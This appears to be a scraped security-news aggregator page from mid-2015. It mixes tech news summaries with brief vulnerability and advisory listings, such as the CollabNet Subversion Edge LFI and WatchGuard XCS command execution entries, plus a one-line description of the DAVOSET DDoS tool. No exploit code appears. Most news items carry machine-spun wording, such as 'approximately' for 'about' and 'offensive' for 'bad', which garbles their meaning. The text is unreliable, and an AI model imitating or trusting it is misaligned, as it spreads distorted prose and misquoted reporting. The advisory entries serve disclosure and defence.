Analysis: Iran’s Nuclear Program Has Been an Astronomical Waste

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Lasrick writes: Business Insider’s Armin Rosen uses a fuel-cost calculator from the Bulletin of the Atomic Scientists to show that Iran’s nuclear program has been “astronomically costly” for the country. Rosen uses calculations from this tool to hypothesize that what Iran “interprets as the country’s ‘rights’ under the 1970 Non-Proliferation Treaty is a diplomatic victory[…]

OpenSSH 6.9p1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

This is a Linux/portable port of OpenBSD’s superior OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen’s SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, & many other clean-ups. View Source

Apple Security Advisory 2015-06-30-4

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-4 – Safari 8.0.7, Safari 7.1.7, & Safari 6.2.7 are now available & address account takeover, WebSQL database access, & various other issues. View Source

Apple Security Advisory 2015-06-30-3

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-3 – Mac EFI Security Update 2015-001 is now available & addresses EFI flash memory modification & memory corruption issues. View Source

Apple Security Advisory 2015-06-30-2

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-2 – OS X Yosemite 10.10.4 & Security Update 2015-005 are now available & address privilege escalation, arbitrary code execution, access bypass, & various other vulnerabilities. View Source

UK’s National Computer Museum Looks For Help Repairing BBC Micros

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

tresho writes: 1981-era 8-bit BBC Micro computers & peripherals are displayed in a special interactive exhibit at the UK’s National Museum of Computing designed to donate modern students a taste of programming a vintage machine. Now, the museum is asking for assist maintaining them. “We want to find out whether people have received skills out[…]

Apple Security Advisory 2015-06-30-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-1 – iOS 8.4 is now available & addresses denial of service, an incorrect issued certificate, arbitrary code execution, & various other flaws. View Source

Faraday 1.0.11

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation & analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take[…]

Climatix BACnet/IP Communication Module Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Climatix BACnet/IP communication module versions prior to 10.34 suffer from a cross site scripting vulnerability. View Source

X-Cart 4.5.0 Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

X-Cart version 4.5.0 suffers from a cross site scripting vulnerability. View Source

Surveillance Court: NSA Can Resume Bulk Surveillance

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

An anonymous reader writes: We all celebrated back in May when a federal court ruled the NSA’s phone surveillance illegal, & again at the beginning of June, when the Patriot Act expired, ending authorization for that surveillance. Unfortunately, the NY Times now reports on a ruling from the Foreign Intelligence Surveillance Court, which concluded that[…]

TimeDoctor Pro 1.4.72.3 Insecure Transport

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

TimeDoctor autoupdate feature downloads & executes files over plain HTTP & doesn’t perform any check with the files. An attacker with MITM capabilities (i.e., when user connects to a public wifi) could override the Timedoctor subdomain & then execute custom binaries on the machine where the application is running. View Source

ManageEngine Password Manager Pro 8.1 SQL Injection

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

ManageEngine Password Manager Pro version 8.1 suffers from a remote SQL injection vulnerability. View Source

Red Hat Security Advisory 2015-1199-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Red Hat Security Advisory 2015-1199-01 – The kernel packages contain the Linux kernel, the core of any Linux operating system. It was found that the Linux kernel’s implementation of vectored pipe read & write functionality did not take into account the I/O vectors that were already processed when retrying after a failed atomic access operation,[…]

Ubuntu Security Notice USN-2652-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Ubuntu Security Notice 2652-1 – It was discovered that Chromium did not properly consider the scheme when determining whether a URL is associated with a WebUI SiteInstance. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to bypass security restrictions. It was discovered that Blink did[…]

Red Hat Security Advisory 2015-1197-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Red Hat Security Advisory 2015-1197-01 – OpenSSL is a toolkit that implements the Secure Sockets Layer & Transport Layer Security protocols, as well as a full-strength, general purpose cryptography library. An out-of-bounds read flaw was found in the X509_cmp_time() function of OpenSSL. A specially crafted X.509 certificate or a Certificate Revocation List could possibly cause[…]

Packet Storm New Exploits For June, 2015

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

This archive contains 183 exploits that were added to Packet Storm in June, 2015. View Source

Is Safari the New Internet Explorer?

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

An anonymous reader writes: Software developer Nolan Lawson says Apple’s Safari has taken the place of Microsoft’s Internet Explorer as the major browser that lags behind all the others. This comes shortly after the Edge Conference, where major players in web technologies received together to discuss the state of the industry & what’s ahead. Lawson[…]

DAVOSET 1.2.5

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

DAVOSET is a tool for committing distributed denial of service attacks using execution on other sites. View Source

Quebec Government May Force ISPs To Block Gambling Websites

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter ottawan- writes: In order to drive more customers to their own online gambling website, the Quebec government & Loto-Quebec (the provincial organization in charge of gaming & lotteries) are thinking approximately forcing the province’s ISPs to block all other online gambling websites. The list of websites to be blocked will be maintained by[…]

Celebrating Workarounds, Kludges, and Hacks

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

itwbennett writes: We all have some favorite workarounds that right a perceived wrong (like getting around the Wall Street Journal paywall) or make something work the way we think it ought to. From turning off annoying features in your Prius to getting around sanctions in Crimea & convincing your Android phone you’re somewhere you’re not,[…]

Apple Loses Ebook Price Fixing Appeal, Must Pay $450 Million

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: A federal appeals court ruled 2-1 today that Apple indeed conspired with publishers to increase ebook prices. The ruling puts Apple on the hook for the $450 million settlement reached in 2014 with lawyers & attorneys general from 33 states. The Justice Dept. contended that the price-fixing conspiracy raised the price[…]

Stanford Starts the ‘Secure Internet of Things Project’

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: The internet-of-things is here to stay. Lots of people now have smart lights, smart thermostats, smart appliances, smart fire detectors, & other internet-connect gadgets installed in their houses. The security of those devices has been an obvious & predictable problem since day one. Manufacturers can’t be bothered to provide updates to[…]

Cory Doctorow Talks About Fighting the DMCA (2 Videos)

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Wikipedia says, ‘Cory Efram Doctorow (/kri dktro/; born July 17, 1971) is a Canadian-British blogger, journalist, & science fiction author who serves as co-editor of the blog Boing Boing. He is an activist in favour of liberalising copyright laws & a proponent of the Creative Commons organization, using some of their licenses for his books.[…]

White House Lures Mudge From Google To Launch Cyber UL

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

chicksdaddy writes: The Obama Whitehouse has tapped famed hacker Peiter Zatko (aka “Mudge”) to head up a new project aimed at developing an “underwriters’ lab” for cyber security. The new organization would function as an independent, non-profit entity designed to assess the security strengths & weaknesses of products & publishing the results of its tests.[…]

Microsoft To Sell Bing Maps, Advertising Sections

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

UnknowingFool writes: Microsoft has announced that they will sell some Bing Maps technology to Uber & their advertising business to AOL. About 1,300 employees are expected to be offered positions in their new companies. CEO Nadella said previously that there would be “tough choices” to be made. Some outside analysts have said neither venture was[…]

Test Pilot: the F-35 Can’t Dogfight

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

schwit1 sends this report from the War Is Boring column: A test pilot has some very, very offensive news approximately the F-35 Joint Strike Fighter. The pricey new stealth jet can’t turn or climb swift enough to hit an enemy plane during a dogfight or to dodge the enemy’s own gunfire, the pilot reported following[…]

Ask Slashdot: What To Do With Empty Toner Cartridges?

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter MoarSauce123 writes: Over time I accumulated a number of empty toner cartridges for a Brother laser printer. Initially, I wanted to take a local office supply chain store up on their offer to donate me store credit for the returned cartridge. For that credit to be issued I would have to sign up[…]

What If You Could See Asteroids In the Night Sky?

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: As part of Asteroid Day a 360-degree video rendering the night sky with the population of near-earth asteroids included has been created by ‘Astronogamer’ Scott Manley. The video shows how the Earth flies through a cloud of asteroids on its journey around the sun, & yet we’ve only discovered approximately 1%[…]

Interviews: Brian Krebs Answers Your Questions

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

A few weeks ago you had a chance to ask Brian Krebs approximately security, cybercrime & what it’s like to be the victim of Swatting. Below you will find his answers to your questions. Read more of this story at Slashdot. View Source

Nvidia Details ‘Gameworks VR’, Aims To Boost Virtual Reality Render Performance

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: In a guest article published to Road to VR, Nvidia graphics programmer Nathan Reed details Nvidia’s ‘Gameworks VR’ initiative which the company says is designed to boost virtual reality render performance, including support for ‘VR SLI’ which will render one eye view per GPU for low latency stereoscopy. While many Gameworks[…]

Cisco To Acquire OpenDNS

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter Tokolosh writes: Both Cisco & OpenDNS announced today that the former is to acquire the latter. From the Cisco announcement: “To build on Cisco’s advanced threat protection capabilities, we plan to continue to innovate a cloud delivered Security platform integrating OpenDNS’ key capabilities to accelerate that work. Over time, we will look to[…]

RFC 7568 Deprecates SSLv3 As Insecure

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

AmiMoJo writes: SSLv3 should not be used, according to the IETF’s RFC 7568. Despite being replaced by three versions of TLS, SSLv3 is still in use. Clients & servers are now recommended to reject requests to use SSLv3 for secure communication. “SSLv3 Is Comprehensively Broken,” say the authors, & lay out its flaws in detail.[…]

UK Researchers Find IPv6-Related Data Leaks In 11 of 14 VPN Providers

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

jan_jes writes: According to researchers at Queen Mary University of London, services used by hundreds of thousands of people in the UK to protect their identity on the web are vulnerable to leaks. The study of 14 popular VPN providers found that 11 of them leaked information approximately the user because of a vulnerability known[…]

First Fedora Image For the MIPS Available For Testing

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter alexvoica writes: Today Fedora contributor Michal Toman has announced that the first Fedora 22 image for 32-bit MIPS CPUs is available for testing; this version of the operating system was developed using our Creator CI20 microcomputer, which includes a 1.2 GHz dual-core MIPS processor. In addition, Michal announced he is working on a[…]

8 Yelp Reviewers Hit With $1.2 Million Defamation Suits

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter goodboi writes: A Silicon Valley building contractor is suing 8 of its critics over the reviews they posted on Yelp. The negative reviews were filtered out by Yelp’s secretive ranking system, yet in court documents filed earlier this month, Link Corporation claims that the offensive publicity cost over $165,000 in lost business. Read[…]

SMS Co-Inventor Matti Makkonen Dead At 63

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: The BBC News reports that Matti Makkonen, a ‘grand old man of mobile industry’ who helped launch the worldwide sensation of texting, has died at the age of 63 after an illness. Although planning to retire after in 2015 from the board of Finnet Telecoms, Makkonen constantly remained fascinated with communications[…]

European Government Agrees On Net Neutrality Rules, With Exemptions

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: The European Union’s three main legislative bodies, the European Council, the European Parliment, & the European Commision, have reached an agreement on “Open Internet” rules that establish principles similar to Net Neutrality in the EU. The rules require that all internet traffic & users be treated equally, forbidding paid-for prioritisation of[…]

Lawsuit Filed Over Domain Name Registered 16 Years Before Plaintiff’s Use

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

HughPickens.com writes: Cybersquatting is registering, selling or using a domain name with the intent of profiting from the goodwill of someone else’s trademark. It generally refers to the practice of buying up domain names that use the names of existing businesses with the intent to sell the names for a profit to those businesses. Now[…]

How Computer Science Education Got Practical (Again)

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

jfruh writes: In the 1980s & 1990s, thousands of young people who had grown up tinkering with PCs hit college & dove into curricula designed around the vague notion that they might want to “do something with computers.” Today, computer science education is a lot more practical — though in many ways that’s just going[…]

Asteroid Day On June 30 Aims To Raise Awareness of Collision Risks

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

benonemusic writes: International organizers–including Queen’s Brian May, an astrophysicist–have organized the world’s first Asteroid Day on June 30, as a means to raise awareness for future collision risks & encourage actions to minimize the threats from such events. “If we can track the trajectories of asteroids & monitor their movement in our solar system, then[…]

Creating Bacterial "Fight Clubs" To Discover New Drugs

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Science_afficionado writes: Vanderbilt chemists have shown that creating bacterial ‘fight clubs’ is an effective way to discover natural biomolecules with the properties required for new drugs. They have demonstrated the method by using it to discover a new class of antibiotic with anti-cancer properties. From the Vanderbilt website: “That is the conclusion of a team[…]

The Programmer’s Path To Management

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

snydeq writes: The transition from command line to line-of-command requires a new mind-set — & a thick skin, writes InfoWorld’s Paul Heltzel in a tips-based article aimed at programmers interested in breaking into management. “Talented engineers may see managing a team as the next step to growing their careers. So if you’re moving in this[…]

How IKEA Patched Shellshock

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

jones_supa writes: Magnus Glantz, IT manager at IKEA, revealed that the Swedish furniture retailer has more than 3,500 Red Hat Enterprise Linux servers. With Shellshock, every single one of those servers needed to be patched to limit the risk of exploitation. So how did IKEA patch all those servers? Glantz showed a simple one-line Linux[…]

Study Suggests That HUD Tech May Actually Reduce Driving Safety

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Zothecula writes: Having a heads-up display constantly feed you information while cruising down the road may make you feel like a jet pilot ready to avoid any potential danger yet recent findings suggest otherwise. Studies done at the University of Toronto show that the HUD multi-tasking method of driving a vehicle is dangerous. “Drivers need[…]

Debian Security Advisory 3297-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Debian Linux Security Advisory 3297-1 – It was discovered that unattended-upgrades, a script for automatic installation of security upgrades, did not properly authenticate downloaded packages when the force-confold or force-confnew dpkg options were enabled via the DPkg::Options::* apt configuration. View Source

Ubuntu Security Notice USN-2657-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Ubuntu Security Notice 2657-1 – It was discovered that unattended-upgrades incorrectly performed authentication checks in certain configurations. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could potentially be used to install altered packages. View Source

Red Hat Security Advisory 2015-1196-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1196-01 – PostgreSQL is an advanced object-relational database management system. A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered. It was discovered that PostgreSQL[…]

Red Hat Security Advisory 2015-1195-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1195-01 – PostgreSQL is an advanced object-relational database management system. A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered. It was discovered that PostgreSQL[…]

Red Hat Security Advisory 2015-1193-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1193-01 – Xerces-C is a validating XML parser written in a portable subset of C++. A flaw was found in the way the Xerces-C XML parser processed certain XML documents. A remote attacker could provide specially crafted XML input that, when parsed by an application using Xerces-C, would cause that application[…]

Red Hat Security Advisory 2015-1194-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1194-01 – PostgreSQL is an advanced object-relational database management system. A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered. It was discovered that PostgreSQL[…]

Watchguard XCS 10.0 SQL Injection / Command Execution

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The Watchguard XCS virtual appliance contains a number of vulnerabilities, including unauthenticated SQL injection, command execution & privilege escalation. By combining these vulnerabilities, an attacker may remotely obtain root privileges on the underlying host. Versions 10.0 & below are affected. View Source

CollabNet Subversion Edge Management CSRF

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend fails to implement any cross site request forgery protection. Fixed in version 5.0. Version 4.0.11 is affected. View Source

WedgeOS 4.0.4 Arbitrary File Read / Command Execution

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Wedge Networks WedgeOS Virtual Appliance contains a number of security vulnerabilities, including unauthenticated arbitrary file read as root, command injection in the web interface, privilege escalation to root, & command execution via the system update functionality. Versions 4.0.4 & below are affected. View Source

CollabNet Subversion Edge Management Tail LFI

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile “filename” parameter of the tail action. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Missing Password Check

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The management frontend does not require the old password for changing the password to a new one. An authenticated attacker may perform password setting attacks via XSRF without knowing the current password. An attacker that stole a Session ID (cookie) is able to gain persistent access by changing the password. Fixed in version 5.0. Version[…]

NetIQ Access Manager 4.0 SP1 XXE Injection

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

NetIQ Access Manager is vulnerable to XXE injection attacks. View Source

CollabNet Subversion Edge Management Unsalted Hashes

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management stores passwords as unsalted MD5 hashes. Unsalted MD5 hashes can easily be cracked by brute forcing the password. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Multiple Logins

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management web application does not restrict users to be logged in only once & does not provide a configuration option to configure this feature for admins and/or user accounts. Fixed in version 5.0. Version 4.0.11 is affected. View Source

Courier Heap Overflow / Out Of Bounds Read Access

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Courier mail server versions before 0.75 suffer from out of bounds read access & heap overflow vulnerabilities. View Source

CollabNet Subversion Edge Management Brute Forcing

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend does not protect against brute forcing accounts. An attacker has infinite tries to guess a valid user password. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management listViewItem LFI

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile “listViewItem” parameter of the “index” action. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Show LFI

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile “filename” parameter of the show action. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Clickjacking

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

CollabNet Subversion Edge Management Frontend does not implement clickjacking protection. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Weak Password Policy

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management does not implement a strong passwordpolicy. Passwords like “aaaaa” are allowed as the only requirement is that the password is at least 5 characters long. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Autocomplete Enabled

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge management frontend login page password field has autocomplete enabled. This may allow an attacker to retrieve a stored password from the browsers key store. Fixed in version 5.0. Version 4.0.11 is affected. View Source

Ask Slashdot: Choosing the Right Open Source License

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

NicknamesAreStupid writes: I need to select an open source license. I am developing an open source iOS application that use a significant number of other open source projects which, in turn, use a number of different open source licenses such as MPL/GPL, MIT, & BSD. I am moreover using sample code from Apple’s developer site,[…]

Uber France Leaders Arrested For Running Illegal Taxi Company

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Two Uber executives were arrested by French authorities for running an illegal taxi company & concealing illegal documents. This is not the first time Uber has run into trouble in France. Recently, taxi drivers started a nation-wide protest, blocking access to Roissy airport & the nation’s interior minister issued a ban[…]

Airplane Coatings Help Recoup Fuel Efficiency Lost To Bug Splatter

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

MTorrice writes: When bugs hit the wings of oncoming airplanes, they create a problem. Their blood, called hemolymph, sticks to an airplane’s wings, disrupting the smooth airflow over them & reducing the aircraft’s fuel efficiency. To fight the problem, NASA is working on developing a coating that could assist aircraft repel bug remains during flight.[…]

Malwarebytes Offers Pirates Its Premium Antimalware Product For Free

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: If you have a cracked or pirated version of Malwarebytes Anti-Malware (MBAM) product the company has debuted an Amnesty program for you. Venturebeat reports: “If you pirated Malwarebytes Anti-Malware, purchased a counterfeit version of the software, or are having problems with your key in general, the company is offering a free[…]

Avira Wins Case Upholding Its Right To Block Adware

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Mark Wilson writes: Security firm Avira has won a court case that can not only be chalked up as a win for consumer rights, yet could moreover set something of a precedent. Germany company Freemium.com took Avira to court for warning users approximately “potentially unwanted applications” that could be bundled along with a number of[…]

To Learn (Or Not Learn) JQuery

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Nerval’s Lobster writes: jQuery isn’t without its controversies, & some developers distrust its use in larger projects because (some say) it ultimately leads to breakage-prone code that’s harder to maintain. But given its prevalence, jQuery is probably essential to know, yet what are the most significant elements to learn in order to become adept-enough at[…]

The Real-Life Dangers of Augmented Reality

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Tekla Perry writes: Today’s augmented reality devices have yet to go through extensive tests of their impact on their wearers’ health & safety. But by looking at existing research involving visual & motor impairments, two Kaiser Permanente researchers find they can draw conclusions approximately the promise & perils of augmented reality, & point to ways[…]

SCOTUS Denies Google’s Request To Appeal Oracle API Case

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

New submitter Neil_Brown writes: The Supreme Court of the United States has today denied Google’s request to appeal against the Court of Appeals for the Federal Circuit’s ruling (PDF) that the structure, sequence & organization of 37 of Oracle’s APIs (application program interfaces) was capable of copyright protection. The case is not over, as Google[…]

Interviews: Ask Steve Jackson About Designing Games

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Since starting his own company in 1980, Steve Jackson, founder & editor-in-chief of Steve Jackson Games, has created a number of hits, starting with Car Wars . . . followed shortly by Illuminati, & after by GURPS, the “Generic Universal Roleplaying System.” In 1983, he was elected to the Adventure Gaming Hall of Fame –[…]

When a Company Gets Sold, Your Data May Be Sold, Too

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: A new report points out that many of the top internet sites have language in their privacy policies saying that your private data might be transferred in the event of an acquisition, bankruptcy sale, or other transaction. They effectively say, “We won’t ever sell your information, unless things go offensive for[…]

MIT System Fixes Software Bugs Without Access To Source Code

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

jan_jes writes: MIT researchers have presented a new system at the Association for Computing Machinery’s Programming Language Design & Implementation conference that repairs software bugs by automatically importing functionality from other, more secure applications. According to MIT, “The system, dubbed CodePhage, doesn’t require access to the source code of the applications. Instead, it analyzes the[…]

libpcap 1.7.4

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Libpcap is a portable packet capture library which is used in many packet sniffers, including Tcpdump. View Source

GetSimple CMS 5.7.3.1 Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

GetSimple CMS version 5.7.3.1 suffers from a persistent cross site scripting vulnerability. View Source

MODX Revolution 2.3.3-pl Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

MODX Revolution version 2.3.3-pl suffers from multiple cross site scripting vulnerabilities. View Source

Fiyo CMS 2.0_1.9.1 SQL Injection

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Fiyo CMS version 2.0_1.9.1 suffers from multiple remote SQL injection vulnerabilities. View Source

Novius OS 5.0.1-elche XSS / LFI / Open Redirect

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Novius OS version 5.0.1-elche suffers from cross site scripting, local file inclusion, & open redirection vulnerabilities. View Source

CollabNet Subversion Edge Management Local File Inclusion

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile “filename” parameter of the “downloadHook” action. Fixed in version 5.0. View Source

Bill Gates Investing $2 Billion In Renewables

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Bill Gates has dumped a billion dollars into renewables, & now he’s ready to double down. Gates announced he will increase his investment in renewable energy technologies to $2 billion in an attempt to “bend the curve” on limiting climate change. He is focusing on risky investments that favor “breakthrough” technologies[…]

CollabNet Subversion Edge Management Credential Leak

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

The CollabNet Subversion Edge Management Frontend leaks the unsalted MD5 hash of password of the currently logged in user via a “POST /csvn/user/index” request. An attacker that exploits an XSS or has gained a valid session via other means is able to retrieve the unsalted MD5 hash of the corresponding user & easily crack the[…]

Microsec e-Szigno / Netlock Mokka XML Signature Wrapping

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Microsec e-Szigno & Netlock Mokka computer applications suffer from a e-akta signature verification weakness. Microsec e-Szigno version older than 3.2.7.12 & Netlock Mokka versions older than 2.7.8.1204 are affected. View Source

ESRS VE 3.0x Certificate Validation / Insufficient Randomness

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Secure Remote Services (ESRS) Virtual Edition (VE) versions 3.02, 3.03, & 3.04 do not properly validate certificates. Malicious users could potentially exploit this vulnerability to spoof trusted entities by using man-in-the-middle attacks. Session cookie used by ESRS VE is generated using insufficient random values. Malicious users could potentially exploit this vulnerability to gain unauthorized access[…]

Debian Security Advisory 3296-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Debian Linux Security Advisory 3296-1 – Evgeny Sidorov discovered that libcrypto++, a general purpose C++ cryptographic library, did not properly implement blinding to mask private key operations for the Rabin-Williams digital signature algorithm. This could allow remote attackers to mount a timing attack & retrieve the user’s private key. View Source

HP Security Bulletin HPSBPI03360 2

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

